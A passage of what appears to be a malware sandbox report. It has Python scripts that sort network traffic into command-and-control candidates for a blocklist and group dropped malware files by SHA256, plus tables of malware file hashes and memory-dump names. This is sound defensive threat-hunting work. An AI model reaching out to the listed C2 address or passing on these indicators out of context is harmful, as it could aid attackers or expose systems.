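    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dst, domain, proto = cells
        # "| RU | 77.105.132.87:17066 | tcp | |": protocol landed in the Domain column
        if domain.lower() in ("tcp", "udp") and proto == "":
            domain, proto = "", domain
        rows.append({"country": country, "dst": dst, "domain": domain, "proto": proto.lower()})
    return rows


def _under(domain, zones):
    return any(domain == z or domain.endswith("." + z) for z in zones)


def classify(row):
    host = row["dst"].rsplit(":", 1)[0]
    domain = row["domain"]
    if row["dst"] == RESOLVER and row["proto"] == "udp":
        return "reverse_lookup" if domain.endswith(".in-addr.arpa") else "dns_query"
    if _under(domain, IP_LOOKUP):
        return "ip_lookup"
    if _under(domain, LEGIT_HOSTING):
        return "legit_hosting"
    if domain in ("", "N/A") or domain == host:
        return "direct_ip"          # connection with no name behind it: C2 candidate
    return "other"


def triage(text):
    result = {"c2_candidates": [], "legit_hosting": set(), "ip_lookup": set(),
              "dns_queries": set(), "reverse_lookups": 0, "other": []}
    for row in parse_rows(text):
        kind = classify(row)
        if kind == "direct_ip":
            if row["dst"] not in result["c2_candidates"]:   # keep first-seen order, drop repeats
                result["c2_candidates"].append(row["dst"])
        elif kind == "legit_hosting":
            result["legit_hosting"].add(row["domain"])
        elif kind == "ip_lookup":
            result["ip_lookup"].add(row["domain"])
        elif kind == "dns_query":
            result["dns_queries"].add(row["domain"])
        elif kind == "reverse_lookup":
            result["reverse_lookups"] += 1
        else:
            result["other"].append(row)
    return result


def blocklist(result):
    """(ip, port) pairs for the direct-IP C2 candidates only."""
    out = []
    for dst in result["c2_candidates"]:
        ip, port = dst.rsplit(":", 1)
        out.append((ip, int(port)))
    return out


if __name__ == "__main__":
    r = triage(SAMPLE_ROWS)
    for ip, port in blocklist(r):
        print(f"block {ip}:{port}")
    print("abused legitimate services (hunt, do not block):", sorted(r["legit_hosting"]))
    print("external IP lookup:", sorted(r["ip_lookup"]))
```

Only the direct-IP bucket is safe to feed into a firewall or IDS blocklist; the hosting-provider domains are shared infrastructure and belong in hunting queries, and the reverse lookups are sandbox noise that would only inflate an IOC feed.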
Files
memory/4572-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3552-1-0x00000000028F0000-0x0000000002906000-memory.dmp
memory/4572-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F7ED.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/1832-12-0x0000000000A80000-0x0000000000AD2000-memory.dmp
memory/1832-17-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1832-18-0x0000000005760000-0x0000000005D04000-memory.dmp
memory/1832-19-0x00000000051B0000-0x0000000005242000-memory.dmp
memory/1832-20-0x0000000005110000-0x0000000005120000-memory.dmp
memory/1832-22-0x0000000005340000-0x000000000534A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\933.exe
| MD5 | 1713300ba962c869477e37e4b31e40af |
| SHA1 | d5c4835bc910acccd28dbed0c451043ea8de95ef |
| SHA256 | 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d |
| SHA512 | 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1 |
C:\Users\Admin\AppData\Local\Temp\933.exe
| MD5 | 068690aedee04ddb02bfe5d5eadd2892 |
| SHA1 | 5c84769fe148af03bce4acb9ce95da2f089b810f |
| SHA256 | b376c42b8254e7851c0afb17bdfd169b5f7a46ca0bcb7b133a985ee979b68096 |
| SHA512 | 0a23833e7d0d41f60b582b00e80fe1431690446e6bec01ce6b812ae59f92b65e03d36ddb12e4b9184d8e9121b902f08d2a727d86e05a7e5a99aa08509b31de24 |
memory/1608-26-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1608-27-0x0000000000FE0000-0x000000000147E000-memory.dmp
memory/1608-29-0x0000000005FC0000-0x000000000605C000-memory.dmp
memory/1832-28-0x00000000067C0000-0x0000000006DD8000-memory.dmp
memory/1608-32-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1832-31-0x00000000066A0000-0x00000000067AA000-memory.dmp
memory/1832-33-0x00000000065C0000-0x00000000065D2000-memory.dmp
memory/1832-34-0x0000000006620000-0x000000000665C000-memory.dmp
memory/1832-35-0x00000000080C0000-0x000000000810C000-memory.dmp
memory/1832-36-0x0000000008C50000-0x0000000008CB6000-memory.dmp
memory/1832-37-0x0000000009090000-0x00000000090E0000-memory.dmp
memory/1608-38-0x0000000006840000-0x0000000006A08000-memory.dmp
memory/1608-39-0x0000000007C40000-0x0000000007DD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
memory/1608-45-0x0000000005FA0000-0x0000000005FB0000-memory.dmp
memory/1608-46-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-47-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-48-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-50-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-49-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-52-0x00000000083A0000-0x00000000084A0000-memory.dmp
memory/1608-53-0x00000000083A0000-0x00000000084A0000-memory.dmp
memory/1608-51-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-55-0x00000000083A0000-0x00000000084A0000-memory.dmp
memory/1356-54-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1832-58-0x00000000094B0000-0x0000000009672000-memory.dmp
memory/1832-57-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1356-59-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1832-60-0x0000000009BB0000-0x000000000A0DC000-memory.dmp
memory/1832-62-0x0000000005110000-0x0000000005120000-memory.dmp
memory/1608-63-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1356-64-0x0000000004E90000-0x0000000004EA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4071.exe
| MD5 | 54226b2db6b4ef852164ef8b69426a6c |
| SHA1 | a1c36dd7cfedbfe86c07fe260d71eefa2d591afc |
| SHA256 | b2d8928ba610dbfd4f652c6899ab552251629af0d210fa43efc7b04f5471f1c2 |
| SHA512 | f8a51ec93b04d0454b5123195c58b880ef79b242171d3694393ec982feb257b7d7644a92cbe854b37fc7265f0f3868fe1d05619f109866fa13272339c7c28aab |
C:\Users\Admin\AppData\Local\Temp\4071.exe
| MD5 | 4b86d5128a5ae0104c07fdc960a220c1 |
| SHA1 | 1a18a3ea1ff82f450f5987cd542de472ee47e8e9 |
| SHA256 | 7c95d92c932dc5f68fce72bc91bd10af80e20b7a0f99c1fdecd303694ca62c05 |
| SHA512 | 4c7818627141f1593ccc7f9735e0511b3ed8b5bc359e2cbf34b151c32d19ec277e81c61cae84d38596a87bec12e18e7c89ac981b557b94b4cdd3706d35c1f7a7 |
memory/1504-68-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1504-69-0x0000000000D00000-0x0000000001AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | fd3967790f9b00f107ad32b2918330a0 |
| SHA1 | da44a0403f61da1946c9f6a8aac8a7b5fb4a393b |
| SHA256 | 0c3a6022d16181647d51aa0a3a940887598afeeb0f6b2bba8eb4eaccd6c78a38 |
| SHA512 | b0db15140dc3e0e83acbfa671dd8708ff9309b54e58446b73ae109853f118df47fbd8d7e82ab3e84ace4743501bed6e8dc001f2890c1e5f98cdb0cefbeed5f3a |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
C:\Users\Admin\AppData\Local\Temp\4CB7.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | ba3c9a8bb110eab47d50289bb5b2649e |
| SHA1 | 712ac41a981c905d2e196e09de6c5b07aecf817d |
| SHA256 | e75c74dea2242ec3ef269f3c1ecbb11e3596e8aa7f3f6f0103f6764248403729 |
| SHA512 | 59712293eb0c55a1988bfc64668e7552a0ec128da9361cb5665c936cb754ae9d1fe55f4a33a395ee7dcf205988fb0e0f17b00007b1283aa92c25895aa061efcf |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 92fd3981a506dfbb1693fc0b7408178f |
| SHA1 | 36ac4436c87a418f4d4a1ec0ef894bcfa9c9fffd |
| SHA256 | 8993a7cc631b326a6f4f0c7b69ea7ecb59a3687ae3ee458a3dab21f680cdb756 |
| SHA512 | 94a08867275ea41a610acfb8a62c6521b4b498e42100f3d2083229658939bf00a5136cfa6dc47d090dbd82756411dc47374cbe23c6204062120bb1c15e299704 |
C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | cbac498919a9c98b2eb0275337292117 |
| SHA1 | cc922e05683632b1545d46413fc16f1987e83272 |
| SHA256 | 869874cb38b537f1f78c300726923208fa9dfd4ebbd2e34aa43c6c784bf63e51 |
| SHA512 | 7b0c353ebe187b5891b15a2baeb1a3a7dfc2b5ef1bcb00124a57b1b8d90859e40e40e80c71a6636b85069b4cfd43d144e453cdae22babb891b09a0da138de4c4 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | f13a7efa3ff667b3c48772966ad11f90 |
| SHA1 | b764e17683fbb95de8f93d030b7372f3276f76b8 |
| SHA256 | 2f83ad42a1f0f0f360423e24029a29a58a4289d016e32cc28cc186ec9abb764e |
| SHA512 | 7def7d78d7421ace9c04e718faeca1a520fb3cc34b4b072477a9d354a606a69c74fc3681ca44fbed6e5184e1aeec4e8094d3684ad8fde0a696698c85266b1250 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 442d527f5a1fbb69048d287300832509 |
| SHA1 | 595d5a1496c5ee16b0a86a81908394d342515fb5 |
| SHA256 | dfdf8791420306ac13e642edf65f09cbbc70817a6f8532cd056bc24068100c79 |
| SHA512 | 6e95912897814692ad234e52f8beafe150af22648cd68d7ca933cfe8411e83aa50f4643f7bb4f4fe415df3b422bfd942120b16a527d723c4f12159116b8684ad |
C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
memory/1704-126-0x0000000000990000-0x0000000000999000-memory.dmp
memory/1504-130-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1132-132-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1132-128-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4372-127-0x0000000000400000-0x0000000000418000-memory.dmp
memory/1704-125-0x0000000000A00000-0x0000000000B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 134a8d26b1a4d45ddc81bf78dad8bfc8 |
| SHA1 | 7494cdcaedf79868d5c60e1d27de594f00ca6afe |
| SHA256 | 1d105f8ea1def43bbdd9b146f871312b8d7e07c8a04d7f8762da3f4d347e0f48 |
| SHA512 | 7ced5f5513b6a7f5d685f604378ee4e725903dc62a5f3149ae92140acd7aeaa4fdf57491a54d400054449e63fe754f7649a7dc9e9cb080c9a87300ac523bc22b |
C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | cebb587a4ae00a76e325a152c72d4e75 |
| SHA1 | ecd669d5cbb36bdc1603c874389affd575568a8e |
| SHA256 | 0051ece33b859b57790852bd73ebdeee32af04e3ebe024bf32e2209893f3134b |
| SHA512 | cb9ad2d2fc416ef85f10a36401c1a1a31d71ca7a73e4385326f9f6a5ff7acc0a646b819b242b46b24f006597872e1f1b8d9305e4005b105d2889f42e4fde009e |
C:\Users\Admin\AppData\Local\Temp\is-IQN02.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
C:\Users\Admin\AppData\Local\Temp\is-IQN02.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/1032-152-0x00007FFD8D690000-0x00007FFD8E151000-memory.dmp
memory/1032-153-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp
memory/1032-154-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp
memory/1872-155-0x0000000002200000-0x0000000002201000-memory.dmp
memory/1032-157-0x0000027C4F730000-0x0000027C4F752000-memory.dmp
memory/1936-166-0x0000000000B40000-0x0000000000B41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa0cdmpw.nvb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4292-167-0x0000000002980000-0x0000000002D84000-memory.dmp
memory/4292-168-0x0000000002E90000-0x000000000377B000-memory.dmp
memory/1032-169-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp
memory/4292-170-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3552-171-0x0000000002940000-0x0000000002956000-memory.dmp
memory/1132-172-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1356-234-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1832-239-0x0000000005110000-0x0000000005120000-memory.dmp
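The Files sections of both runs list the same path more than once with different digests (InstallSetup9.exe appears three times in behavioral1 with three different SHA256 values) and the same content at different paths (Math.dll and INetC.dll under nsoCACF.tmp in behavioral1 and nsd589C.tmp in behavioral2), so grouping by path gives the wrong picture; grouping by SHA256 is what a hunt needs. The script below is an added example, not part of this report. It parses the path-plus-hash-table layout used above, validates digest lengths, groups artifacts by SHA256, flags names that appear with more than one content, and decodes the memory-dump names into PID and region size. The sample is a constructed subset of this report's own entries plus one deliberately truncated digest to exercise the validation.

```python
import re
from collections import defaultdict

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HEX_RE = re.compile(r"^[0-9a-f]+$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed sample: entries copied from the Files sections of this report, plus the
# final "constructed_truncated.exe" entry, which is made up to show hash validation.
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 0b4f47c84fea3289d10a7c8ee44e9a05 |
| SHA1 | 1dcee1baf50d19875fac2fe10c9be03cc56d14a3 |
| SHA256 | 46c923f681342628b916cd91c459a1ffb5ea616bc0d3a1cd534a25ef60058f1b |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 93fd9db8463f1399af604b73f5b91f98 |
| SHA1 | fa74506d738165d8b393eddd9d4946658a0ce9d0 |
| SHA256 | 2db9f15147bc3d2c0eedfef29143bfb09a9252dade8f35ebc77ab4943a1b7b28 |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | da02cbbe2494696eab1d22b727df2568 |
| SHA1 | 000cf27825245f6808d338fa9166b79079802641 |
| SHA256 | 6037979e0cdf0b3f983483e00d964ee1a1d17075da3e313610254269ac186cbf |
\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
memory/2796-19-0x0000000074EB0000-0x000000007559E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
C:\Users\Admin\AppData\Local\Temp\constructed_truncated.exe
| MD5 | 0b4f47c84fea3289 |
"""


def parse_files(text):
    """Return file artifacts (path + validated hashes) and memory-dump artifacts in order."""
    artifacts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("|"):                      # hash row belonging to the current file
            if current is None:
                continue
            cells = [c.strip() for c in line.strip("|").split("|")]
            if len(cells) != 2:
                continue
            algo, digest = cells[0].upper(), cells[1].lower()
            expected = HASH_LENGTHS.get(algo)
            if expected is None or len(digest) != expected or not HEX_RE.match(digest):
                current["bad_hashes"].append((algo, digest))   # truncated or non-hex: do not hunt on it
                continue
            current["hashes"][algo] = digest
            continue
        m = MEM_RE.match(line)
        if m:                                         # memory/<pid>-<seq>-<start>-<end>-memory.dmp
            pid, seq, start, end = m.groups()
            artifacts.append({"kind": "memory", "pid": int(pid), "seq": int(seq),
                              "start": int(start, 16), "size": int(end, 16) - int(start, 16)})
            current = None
            continue
        current = {"kind": "file", "path": line,
                   "name": line.replace("\\", "/").rsplit("/", 1)[-1].lower(),
                   "hashes": {}, "bad_hashes": []}
        artifacts.append(current)
    return artifacts


def dedupe_by_sha256(artifacts):
    """SHA256 -> {paths seen, md5, sha1}; one hunt entry per distinct content."""
    by_hash = defaultdict(lambda: {"paths": set(), "md5": None, "sha1": None})
    for a in artifacts:
        if a["kind"] != "file" or "SHA256" not in a["hashes"]:
            continue
        entry = by_hash[a["hashes"]["SHA256"]]
        entry["paths"].add(a["path"])
        entry["md5"] = a["hashes"].get("MD5", entry["md5"])
        entry["sha1"] = a["hashes"].get("SHA1", entry["sha1"])
    return dict(by_hash)


def same_name_different_content(artifacts):
    """Basenames that were written with more than one distinct SHA256 (re-downloaded droppers)."""
    names = defaultdict(set)
    for a in artifacts:
        if a["kind"] == "file" and "SHA256" in a["hashes"]:
            names[a["name"]].add(a["hashes"]["SHA256"])
    return {n: len(h) for n, h in names.items() if len(h) > 1}


if __name__ == "__main__":
    arts = parse_files(SAMPLE_FILES)
    for sha256, e in dedupe_by_sha256(arts).items():
        print(sha256, sorted(e["paths"]))
    print("same name, different content:", same_name_different_content(arts))
    print("memory regions:", [(a["pid"], hex(a["size"])) for a in arts if a["kind"] == "memory"])
```

The SHA256 (or SHA1) values are the ones to pivot on; the MD5 column is kept only for matching against older feeds. Note that every InstallSetup9.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe and tuc3.exe variant in the tables above is a separate object for hunting purposes even though the path is the same.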